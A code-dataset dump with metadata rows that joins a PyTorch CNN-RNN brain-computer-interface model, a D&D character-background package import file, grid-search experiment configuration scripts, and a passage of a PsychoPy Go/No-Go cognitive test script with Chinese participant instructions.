self.fc3_act_o = self.fc3_act(self.fc3_o)
self.fc3_drop_o = self.fc3_drop(self.fc3_act_o)
self.fc3_view_o = self.fc3_drop_o.view(-1, self.rnn_win_sz, self.fc_sz)
self.fc3_trans_o = self.fc3_view_o.transpose(0, 1)
# RNN
self.rnn_out = []
hx = torch.zeros(self.fc3_trans_o[0].size()[0], self.rnn_hidden_sz, dtype=input.dtype, device=input.device)
for i in range(self.rnn_win_sz):
hx = self.rnncell4(self.fc3_trans_o[i], hx)
self.rnn_out.append(hx)
# MLP
self.fc5_i = self.rnn_out[-1]
self.fc5_o = self.fc5(self.fc5_i)
return nn.Hardtanh()(self.fc5_o)
class Cascade_CNN_RNN_fp_rnn(torch.nn.Module):
"""
This is the hybrid unary binary version of the cascade CNN RNN for BCI, i.e., uBrain
But the rnn is in fp format, so that entire model is trainable.
"""
def __init__(self,
input_sz=[10, 11],
linear_act="scalerelu",
cnn_chn=16,
cnn_kn_sz=3,
cnn_padding=1, # default perform same conv
fc_sz=256,
rnn="mgu",
rnn_win_sz=10,
rnn_hidden_sz=64,
rnn_hard=True,
bias=False,
init_std=None,
keep_prob=0.5,
num_class=[5, 2],
bitwidth_tc=8,
bitwidth_rc=8,
rng="Sobol",
conv1_weight=None,
conv1_bias=None,
conv2_weight=None,
conv2_bias=None,
fc3_weight=None,
fc3_bias=None,
rnn4_weight_f=None,
rnn4_bias_f=None,
rnn4_weight_n=None,
rnn4_bias_n=None,
fc5_weight=None,
fc5_bias=None,
depth=10,
depth_ismul=5):
super(Cascade_CNN_RNN, self).__init__()
self.input_sz = input_sz
self.cnn_chn = cnn_chn
self.cnn_kn_sz = cnn_kn_sz
self.cnn_padding = cnn_padding
self.fc_sz = fc_sz
self.rnn_win_sz = rnn_win_sz
self.rnn_hidden_sz = rnn_hidden_sz
self.bias = bias
self.num_class = num_class
self.bitwidth_tc = bitwidth_tc
self.bitwidth_rc = bitwidth_rc
self.rng = rng
self.conv1_weight = conv1_weight
self.conv1_bias = conv1_bias
self.conv2_weight = conv2_weight
self.conv2_bias = conv2_bias
self.fc3_weight = fc3_weight
self.fc3_bias = fc3_bias
self.rnn4_weight_f = rnn4_weight_f
self.rnn4_bias_f = rnn4_bias_f
self.rnn4_weight_n = rnn4_weight_n
self.rnn4_bias_n = rnn4_bias_n
self.fc5_weight = fc5_weight
self.fc5_bias = fc5_bias
self.cycle_tc = 2**(bitwidth_tc-1)
self.mode = "bipolar"
# CNN
self.conv1 = HUBConv2d(1 , cnn_chn , (cnn_kn_sz, cnn_kn_sz), bias=bias, padding=cnn_padding,
binary_weight=self.conv1_weight, binary_bias=self.conv1_bias, rng=self.rng, cycle=self.cycle_tc)
self.conv2 = HUBConv2d(cnn_chn , cnn_chn*2, (cnn_kn_sz, cnn_kn_sz), bias=bias, padding=cnn_padding,
binary_weight=self.conv2_weight, binary_bias=self.conv2_bias, rng=self.rng, cycle=self.cycle_tc)
self.fc3 = HUBLinear((input_sz[0]+2*2*(cnn_padding-1))*(input_sz[1]+2*2*(cnn_padding-1))*cnn_chn*2, fc_sz, bias=bias,
binary_weight=self.fc3_weight, binary_bias=self.fc3_bias, rng=self.rng, cycle=self.cycle_tc)
self.fc3_drop = nn.Dropout(p=1-keep_prob)
# RNN
if rnn.lower() == "mgu":
self.rnncell4 = HardMGUCell(fc_sz, rnn_hidden_sz, bias=bias, hard=rnn_hard)
else:
print("rnn type needs to be 'mgu'.")
# MLP
self.fc5 = HUBLinear(rnn_hidden_sz, sum(num_class), bias=bias,
binary_weight=self.fc5_weight, binary_bias=self.fc5_bias, rng=self.rng, cycle=self.cycle_tc)
self.linear_act = linear_act.lower()
if self.linear_act == "scalehardsigmoid":
self.conv1_act = ScaleHardsigmoid()
self.conv2_act = ScaleHardsigmoid()
self.fc3_act = ScaleHardsigmoid()
elif self.linear_act == "scalerelu":
self.conv1_act = ScaleReLU()
self.conv2_act = ScaleReLU()
self.fc3_act = ScaleReLU()
elif self.linear_act == "sigmoid":
self.conv1_act = nn.Sigmoid()
self.conv2_act = nn.Sigmoid()
self.fc3_act = nn.Sigmoid()
elif self.linear_act == "hardtanh":
self.conv1_act = nn.Hardtanh()
self.conv2_act = nn.Hardtanh()
self.fc3_act = nn.Hardtanh()
elif self.linear_act == "tanh":
self.conv1_act = nn.Tanh()
self.conv2_act = nn.Tanh()
self.fc3_act = nn.Tanh()
elif self.linear_act == "relu":
self.conv1_act = nn.ReLU()
self.conv2_act = nn.ReLU()
self.fc3_act = nn.ReLU()
elif self.linear_act == "relu6":
self.conv1_act = nn.ReLU6()
self.conv2_act = nn.ReLU6()
self.fc3_act = nn.ReLU6()
elif self.linear_act == "elu":
self.conv1_act = nn.ELU()
self.conv2_act = nn.ELU()
self.fc3_act = nn.ELU()
def forward(self, input, binary_fm_dict=None):
# input is (batch, win, h, w)
# CNN
self.conv1_i = input.view(-1, 1, self.input_sz[0], self.input_sz[1])
self.conv1_o = self.conv1(self.conv1_i)
self.conv1_act_o = self.conv1_act(self.conv1_o)
self.conv2_o = self.conv2(self.conv1_act_o)
self.conv2_act_o = self.conv2_act(self.conv2_o)
self.fc3_i = self.conv2_act_o.view(self.conv2_act_o.shape[0], -1)
self.fc3_o = self.fc3(self.fc3_i)
self.fc3_act_o = self.fc3_act(self.fc3_o)
self.fc3_drop_o = self.fc3_drop(self.fc3_act_o)
self.fc3_view_o = self.fc3_drop_o.view(-1, self.rnn_win_sz, self.fc_sz)
self.fc3_trans_o = self.fc3_view_o.transpose(0, 1)
# RNN
self.rnn_out = []
hx = torch.zeros(self.fc3_trans_o[0].size()[0], self.rnn_hidden_sz, dtype=input.dtype, device=input.device)
for i in range(self.rnn_win_sz):
hx = self.rnncell4(self.fc3_trans_o[i], hx)
self.rnn_out.append(hx)
# MLP
self.fc5_i = self.rnn_out[-1]
self.fc5_o = self.fc5(self.fc5_i)
return nn.Hardtanh()(self.fc5_o)
| 42.277603 | 168 | 0.550366 | 1,770 | 13,402 | 3.875141 | 0.087006 | 0.061233 | 0.041989 | 0.034699 | 0.899256 | 0.893425 | 0.893425 | 0.886718 | 0.886718 | 0.886718 | 0 | 0.038992 | 0.351291 | 13,402 | 316 | 169 | 42.411392 | 0.749942 | 0.0291 | 0 | 0.925373 | 0 | 0 | 0.016974 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0 | 0.052239 | 0 | 0.08209 | 0.007463 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f5b844593d16ec6af3c38a06c0e651e64153ec9e | 258 | py | Python | dnd5gen/char_backgrounds/__init__.py | r3valkyrie/dnd5gen | e88b055aaf24b25f689cb07013f02a73a0d976d7 | [
"MIT"
] | null | null | null | dnd5gen/char_backgrounds/__init__.py | r3valkyrie/dnd5gen | e88b055aaf24b25f689cb07013f02a73a0d976d7 | [
"MIT"
] | 1 | 2020-01-16T21:15:46.000Z | 2020-01-16T21:15:46.000Z | dnd5gen/char_backgrounds/__init__.py | r3valkyrie/dnd5gen | e88b055aaf24b25f689cb07013f02a73a0d976d7 | [
"MIT"
] | null | null | null | from dnd5gen.char_backgrounds.acolyte import Acolyte
from dnd5gen.char_backgrounds.folk_hero import FolkHero
from dnd5gen.char_backgrounds.noble import Noble
from dnd5gen.char_backgrounds.sage import Sage
from dnd5gen.char_backgrounds.soldier import Soldier
| 43 | 55 | 0.883721 | 36 | 258 | 6.166667 | 0.333333 | 0.247748 | 0.337838 | 0.585586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021008 | 0.077519 | 258 | 5 | 56 | 51.6 | 0.911765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
eb18fe689d67a11c7164ae60030bb3a78ad8eaa3 | 5,976 | py | Python | plotting/regenerate_run_scripts (optional).py | GustikS/NeuraLifting | c7e59175f50200897a362dff09b7fe2e7b89e7b6 | [
"MIT"
] | 1 | 2020-07-21T04:35:52.000Z | 2020-07-21T04:35:52.000Z | plotting/regenerate_run_scripts (optional).py | GustikS/NeuraLifting | c7e59175f50200897a362dff09b7fe2e7b89e7b6 | [
"MIT"
] | null | null | null | plotting/regenerate_run_scripts (optional).py | GustikS/NeuraLifting | c7e59175f50200897a362dff09b7fe2e7b89e7b6 | [
"MIT"
] | null | null | null | from grid import *
#%%
grid = GridSetup(experiment_id="digits_lrnn",
param_ranges={"iso": [1, 2, 3, 4], "prune": [1], "xval": [5],
"isocheck": [-1], "isoinits": [1], "ts": [10]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/LRNN_template_embeddings"],
walltime="10:00:00",
memory_max="20g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="digits_gnn",
param_ranges={"iso": [1, 2, 3, 4], "prune": [1], "xval": [5],
"isocheck": [-1], "isoinits": [1], "ts": [10]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/GNN_template_embeddings"],
walltime="10:00:00",
memory_max="20g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="digits_kinships",
param_ranges={"iso": [1, 2, 3, 4], "prune": [1], "xval": [5],
"isocheck": [-1], "isoinits": [1], "ts": [10]},
datasets=["kbs/kinships"],
templates=["template_embeddings"],
walltime="10:00:00",
memory_max="20g",
rci=True,
template_per_dataset=True,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="lossless_kbc",
param_ranges={"iso": [-1, 14], "prune": [-1, 1], "opt": ["adam"], "lr": [0.01],
"xval": [5], "ts": [1000]},
datasets="kbs",
templates=["template_embeddings"],
walltime="23:59:00",
memory_max="30g",
rci=True,
template_per_dataset=True,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="lossless_lrnn",
param_ranges={"iso": [-1, 14], "prune": [-1, 1], "opt": ["adam"], "lr": [0.01],
"xval": [5], "ts": [1000]},
datasets="molecules",
templates=["molecules/LRNN_template_embeddings"],
walltime="23:59:00",
memory_max="30g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="lossless_gnn",
param_ranges={"iso": [-1, 14], "prune": [-1, 1], "opt": ["adam"], "lr": [0.01],
"xval": [5], "ts": [1000]},
datasets="molecules",
templates=["molecules/GNN_template_embeddings"],
walltime="23:59:00",
memory_max="30g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="digits_lrnn_scalar",
param_ranges={"iso": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], "prune": [1], "xval": [5],
"isocheck": [-1], "isoinits": [1], "opt": ["adam"], "lr": [0.01], "ts": [1000]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/scalar_template_embeddings"],
walltime="23:59:00",
memory_max="40g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
#%%
grid = GridSetup(experiment_id="lrnn_scalar",
param_ranges={"iso": [-1], "prune": [-1], "opt": ["adam"], "lr": [0.01],
"xval": [5], "ts": [1000]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/scalar_template_embeddings"],
walltime="23:59:00",
memory_max="80g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
# %%
grid = GridSetup(experiment_id="digits_lrnn_scalar_inits",
param_ranges={"iso": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14], "prune": [1], "xval": [5],
"isocheck": [1], "isoinits": [1, 2, 3], "ts": [10]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/scalar_template_embeddings"],
walltime="20:00:00",
memory_max="40g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
#%%
grid = GridSetup(experiment_id="digits_lrnn_vector",
param_ranges={"iso": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], "prune": [1], "xval": [5],
"isocheck": [1], "isoinits": [1, 2, 3], "ts": [10]},
datasets=["molecules/MDA_MB_231_ATCC"],
templates=["molecules/LRNN_template_embeddings"],
walltime="20:00:00",
memory_max="20g",
rci=True,
template_per_dataset=False,
user="XXXXX")
experiments = grid.generate_experiments()
grid.export_experiments(experiments)
| 36.888889 | 113 | 0.499331 | 591 | 5,976 | 4.846024 | 0.125212 | 0.151885 | 0.080307 | 0.087291 | 0.972067 | 0.968575 | 0.939944 | 0.939944 | 0.937849 | 0.937849 | 0 | 0.064262 | 0.341198 | 5,976 | 161 | 114 | 37.118012 | 0.663195 | 0.004518 | 0 | 0.859504 | 0 | 0 | 0.182186 | 0.07577 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008264 | 0 | 0.008264 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
de1933a8be911c333678d0764ad3ecb315e7398a | 71,037 | py | Python | 3_Go_Nogo/Go_Nogo_Formal_lastrun.py | Brinks0211/cognitive_paradigms_patients | 30e3f8268e5c2b5ebfffcc4ebbcb46d8e60d039e | [
"MIT"
] | 2 | 2020-07-01T12:53:40.000Z | 2020-07-01T13:30:23.000Z | 3_Go_Nogo/Go_Nogo_Formal_lastrun.py | Brinks0211/cognitive_paradigms_patients | 30e3f8268e5c2b5ebfffcc4ebbcb46d8e60d039e | [
"MIT"
] | null | null | null | 3_Go_Nogo/Go_Nogo_Formal_lastrun.py | Brinks0211/cognitive_paradigms_patients | 30e3f8268e5c2b5ebfffcc4ebbcb46d8e60d039e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy3 Experiment Builder (v2020.1.3),
on 六月 15, 2020, at 21:14
If you publish work using this script the most relevant publication is:
Peirce J, Gray JR, Simpson S, MacAskill M, Höchenberger R, Sogo H, Kastman E, Lindeløv JK. (2019)
PsychoPy2: Experiments in behavior made easy Behav Res 51: 195.
https://doi.org/10.3758/s13428-018-01193-y
"""
from __future__ import absolute_import, division
from psychopy import locale_setup
from psychopy import prefs
from psychopy import sound, gui, visual, core, data, event, logging, clock
from psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,
STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)
import numpy as np # whole numpy lib is available, prepend 'np.'
from numpy import (sin, cos, tan, log, log10, pi, average,
sqrt, std, deg2rad, rad2deg, linspace, asarray)
from numpy.random import random, randint, normal, shuffle
import os # handy system and path functions
import sys # to get file system encoding
from psychopy.hardware import keyboard
# Ensure that relative paths start from the same directory as this script
_thisDir = os.path.dirname(os.path.abspath(__file__))
os.chdir(_thisDir)
# Store info about the experiment session
psychopyVersion = '2020.1.3'
expName = 'Go_Nogo_Formal' # from the Builder filename that created this script
expInfo = {'participant': '', '姓名拼音': '', '男1/女2': '', '入院1/出院2': ''}
dlg = gui.DlgFromDict(dictionary=expInfo, sortKeys=False, title=expName)
if dlg.OK == False:
core.quit() # user pressed cancel
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
expInfo['psychopyVersion'] = psychopyVersion
# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc
filename = _thisDir + os.sep + u'data/%s_%s_%s' % (expInfo['participant'], expName, expInfo['date'])
# An ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
extraInfo=expInfo, runtimeInfo=None,
originPath='C:\\Users\\zhang\\Desktop\\张以昊\\课题组\\3_Go_Nogo\\Go_Nogo_Formal_lastrun.py',
savePickle=True, saveWideText=True,
dataFileName=filename)
# save a log file for detail verbose info
logFile = logging.LogFile(filename+'.log', level=logging.EXP)
logging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file
endExpNow = False # flag for 'escape' or other condition => quit the exp
frameTolerance = 0.001 # how close to onset before 'same' frame
# Start Code - component code to be run before the window creation
# Setup the Window
win = visual.Window(
size=[1536, 864], fullscr=True, screen=0,
winType='pyglet', allowGUI=False, allowStencil=False,
monitor='testMonitor', color=[0,0,0], colorSpace='rgb',
blendMode='avg', useFBO=True,
units='height')
# store frame rate of monitor if we can measure it
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] != None:
frameDur = 1.0 / round(expInfo['frameRate'])
else:
frameDur = 1.0 / 60.0 # could not measure, so guess
# create a default keyboard (e.g. to check for escape)
defaultKeyboard = keyboard.Keyboard()
# Initialize components for Routine "introduction1"
introduction1Clock = core.Clock()
introduction_1 = visual.TextStim(win=win, name='introduction_1',
text='欢迎参加测试\n(正式部分)\n\n本测试分两种类型\n\n(继续,请按空格键)',
font='Arial',
pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
key_resp = keyboard.Keyboard()
# Initialize components for Routine "introduction4"
introduction4Clock = core.Clock()
introduction_4 = visual.TextStim(win=win, name='introduction_4',
text='如果准备好了,请开始正式测试\n\n(继续,请按空格键)',
font='Arial',
pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
key_resp_4 = keyboard.Keyboard()
# Initialize components for Routine "introduction2"
introduction2Clock = core.Clock()
introduction_2 = visual.TextStim(win=win, name='introduction_2',
text='第一种类型\n\n测试开始时,屏幕中间会出现注视点“+”\n之后会出现不同类型的红绿灯图片\n\n如果为绿灯或者黄灯,请按下空格键\n如果为红灯,请不要按键\n\n(继续,请按空格键)',
font='Arial',
pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
key_resp_2 = keyboard.Keyboard()
# Initialize components for Routine "light"
lightClock = core.Clock()
concentration = visual.TextStim(win=win, name='concentration',
text='+',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
image = visual.ImageStim(
win=win,
name='image',
image='sin', mask=None,
ori=0, pos=(0, 0), size=(0.5, 0.5),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
key_resp_light = keyboard.Keyboard()
# Initialize components for Routine "introduction3"
introduction3Clock = core.Clock()
introduction_3 = visual.TextStim(win=win, name='introduction_3',
text='第二种类型\n\n测试开始时,屏幕中间会出现注视点“+”\n之后会出现一个表情图片\n\n在每个表情图片出现时\n如果为快乐或者中性,请按下空格键\n如果为悲伤,请不要按键\n\n(继续,请按空格键)',
font='Arial',
pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
key_resp_3 = keyboard.Keyboard()
# Initialize components for Routine "face"
faceClock = core.Clock()
concentration2 = visual.TextStim(win=win, name='concentration2',
text='+',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
image_2 = visual.ImageStim(
win=win,
name='image_2',
image='sin', mask=None,
ori=0, pos=(0, 0), size=(0.4, 0.5),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
key_resp_face = keyboard.Keyboard()
# Initialize components for Routine "tip1"
tip1Clock = core.Clock()
tip_1 = visual.TextStim(win=win, name='tip_1',
text='现在,测试第一种类型\n\n如果为绿灯或者黄灯,请按下空格键\n如果为红灯,请不要按键\n\n(继续,请按空格键)\n',
font='Arial',
pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
key_resp_5 = keyboard.Keyboard()
# Initialize components for Routine "light"
lightClock = core.Clock()
concentration = visual.TextStim(win=win, name='concentration',
text='+',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
image = visual.ImageStim(
win=win,
name='image',
image='sin', mask=None,
ori=0, pos=(0, 0), size=(0.5, 0.5),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
key_resp_light = keyboard.Keyboard()
# Initialize components for Routine "tip2"
tip2Clock = core.Clock()
tip_2 = visual.TextStim(win=win, name='tip_2',
text='现在,测试第二种类型\n\n在每个表情图片出现时\n如果为快乐或者中性,请按下空格键\n如果为悲伤,请不要按键\n\n(继续,请按空格键)\n',
font='Arial',
pos=(0, 0), height=0.05, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
key_resp_7 = keyboard.Keyboard()
# Initialize components for Routine "face"
faceClock = core.Clock()
concentration2 = visual.TextStim(win=win, name='concentration2',
text='+',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
image_2 = visual.ImageStim(
win=win,
name='image_2',
image='sin', mask=None,
ori=0, pos=(0, 0), size=(0.4, 0.5),
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=-1.0)
key_resp_face = keyboard.Keyboard()
# Initialize components for Routine "thanks"
thanksClock = core.Clock()
text = visual.TextStim(win=win, name='text',
text='测试结束,谢谢您的参与',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
languageStyle='LTR',
depth=0.0);
# Create some handy timers
globalClock = core.Clock() # to track the time since experiment started
routineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine
# ------Prepare to start Routine "introduction1"-------
continueRoutine = True
# update component parameters for each repeat
key_resp.keys = []
key_resp.rt = []
_key_resp_allKeys = []
# keep track of which components have finished
introduction1Components = [introduction_1, key_resp]
for thisComponent in introduction1Components:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
introduction1Clock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "introduction1"-------
while continueRoutine:
# get current time
t = introduction1Clock.getTime()
tThisFlip = win.getFutureFlipTime(clock=introduction1Clock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *introduction_1* updates
if introduction_1.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
introduction_1.frameNStart = frameN # exact frame index
introduction_1.tStart = t # local t and not account for scr refresh
introduction_1.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(introduction_1, 'tStartRefresh') # time at next scr refresh
introduction_1.setAutoDraw(True)
# *key_resp* updates
waitOnFlip = False
if key_resp.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
key_resp.frameNStart = frameN # exact frame index
key_resp.tStart = t # local t and not account for scr refresh
key_resp.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(key_resp, 'tStartRefresh') # time at next scr refresh
key_resp.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(key_resp.clock.reset) # t=0 on next screen flip
win.callOnFlip(key_resp.clearEvents, eventType='keyboard') # clear events on next screen flip
if key_resp.status == STARTED and not waitOnFlip:
theseKeys = key_resp.getKeys(keyList=['space'], waitRelease=False)
_key_resp_allKeys.extend(theseKeys)
if len(_key_resp_allKeys):
key_resp.keys = _key_resp_allKeys[-1].name # just the last key pressed
key_resp.rt = _key_resp_allKeys[-1].rt
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in introduction1Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "introduction1"-------
for thisComponent in introduction1Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.addData('introduction_1.started', introduction_1.tStartRefresh)
thisExp.addData('introduction_1.stopped', introduction_1.tStopRefresh)
# the Routine "introduction1" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "introduction4"-------
continueRoutine = True
# update component parameters for each repeat
key_resp_4.keys = []
key_resp_4.rt = []
_key_resp_4_allKeys = []
# keep track of which components have finished
introduction4Components = [introduction_4, key_resp_4]
for thisComponent in introduction4Components:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
introduction4Clock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "introduction4"-------
while continueRoutine:
# get current time
t = introduction4Clock.getTime()
tThisFlip = win.getFutureFlipTime(clock=introduction4Clock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *introduction_4* updates
if introduction_4.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
introduction_4.frameNStart = frameN # exact frame index
introduction_4.tStart = t # local t and not account for scr refresh
introduction_4.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(introduction_4, 'tStartRefresh') # time at next scr refresh
introduction_4.setAutoDraw(True)
# *key_resp_4* updates
waitOnFlip = False
if key_resp_4.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
key_resp_4.frameNStart = frameN # exact frame index
key_resp_4.tStart = t # local t and not account for scr refresh
key_resp_4.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(key_resp_4, 'tStartRefresh') # time at next scr refresh
key_resp_4.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(key_resp_4.clock.reset) # t=0 on next screen flip
win.callOnFlip(key_resp_4.clearEvents, eventType='keyboard') # clear events on next screen flip
if key_resp_4.status == STARTED and not waitOnFlip:
theseKeys = key_resp_4.getKeys(keyList=['space'], waitRelease=False)
_key_resp_4_allKeys.extend(theseKeys)
if len(_key_resp_4_allKeys):
key_resp_4.keys = _key_resp_4_allKeys[-1].name # just the last key pressed
key_resp_4.rt = _key_resp_4_allKeys[-1].rt
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in introduction4Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "introduction4"-------
for thisComponent in introduction4Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.addData('introduction_4.started', introduction_4.tStartRefresh)
thisExp.addData('introduction_4.stopped', introduction_4.tStopRefresh)
# the Routine "introduction4" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "introduction2"-------
continueRoutine = True
# update component parameters for each repeat
key_resp_2.keys = []
key_resp_2.rt = []
_key_resp_2_allKeys = []
# keep track of which components have finished
introduction2Components = [introduction_2, key_resp_2]
for thisComponent in introduction2Components:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
introduction2Clock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "introduction2"-------
while continueRoutine:
# get current time
t = introduction2Clock.getTime()
